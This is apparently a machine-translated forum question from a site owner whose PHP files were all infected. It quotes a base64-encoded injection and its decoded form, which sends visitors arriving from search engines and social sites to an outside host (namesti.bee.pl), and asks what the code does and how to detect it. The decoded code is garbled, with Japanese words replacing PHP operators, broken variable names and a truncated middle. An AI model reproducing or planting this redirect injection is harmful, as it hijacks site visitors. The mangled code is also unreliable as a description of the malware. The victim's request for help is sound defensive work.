この2月14日、私のWebサイトは、2月29日のgoogleのアクションの後に通知されるマルウェアコードに攻撃されましたが、次のコードを取得したことを確認すると、すべてのphpファイルが悪意のあるコードの影響を受けました。
echo base64_decode( "/ KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbmFtZXN0aS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9" );
デコードすると
error_reporting(0); $ qazplm = headers_sent(); if(!$ qazplm){$ referer = $ _SERVER ['HTTP_REFERER']; $ uag = $ _SERVER ['HTTP_USER_AGENT']; if($ uag){if(stristr($ referer、 "yahoo")or stristr($ referer、 "bing")or stristr($ referer、 "rambler")or stristr($ referer、 "gogo")or stristr( $ referer、 "live.com")またはstristr($ referer、 "aport")またはstristr($ referer、 "nigma")またはstristr($ referer、 "webalta")またはstristr($ referer、 "begun.ru" )またはstristr($ referer、 "stumbleupon.com")またはstristr($ referer、 "bit.ly")またはstristr($ referer、 "tinyurl.com")またはpreg_match( "/ yandex.ru/yandsearch \?( 。*?)\&lr \ = / "、$ referer)またはpreg_match(" / google。(。*?)/ url / "、http://namesti.bee.pl/ "); exit();}}}}
サーバーにどのように到達したのかわかりませんが、すべてのphpファイルが影響を受けていますが、他のファイルは問題ありません。Webサイト全体がダウンしています。私はそれがどれほどの害を及ぼす可能性があるか、そしてこのコードが正確に何をするのかを知りたいだけです。どうすればそれを検出できますか。特定の時間に実行されるスクリプトですか。